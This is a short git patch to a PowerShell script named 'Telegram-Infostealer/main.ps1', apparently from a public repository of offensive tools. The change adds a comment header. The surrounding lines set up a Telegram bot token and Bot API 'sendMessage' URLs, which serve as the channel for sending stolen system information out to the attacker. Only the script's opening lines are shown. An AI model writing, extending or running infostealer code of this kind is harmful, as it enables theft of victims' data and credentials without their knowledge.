From f70d2b138dff48a521e4142a26ddbfb95bfc7457 Mon Sep 17 00:00:00 2001 From: egieb <93350544+beigeworm@users.noreply.github.com> Date: Mon, 12 Feb 2024 12:16:03 +0000 Subject: [PATCH] Update main.ps1 --- Telegram-Infostealer/main.ps1 | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/Telegram-Infostealer/main.ps1 b/Telegram-Infostealer/main.ps1 index e0a6641..1e55a24 100644 --- a/Telegram-Infostealer/main.ps1 +++ b/Telegram-Infostealer/main.ps1 @@ -1,4 +1,6 @@ -$token= "$tg" +# TELEGRAM SYSTEM INFORMATION + +$token= "$tg" $apiUrl = "https://api.telegram.org/bot$Token/sendMessage" $URL = 'https://api.telegram.org/bot{0}' -f $Token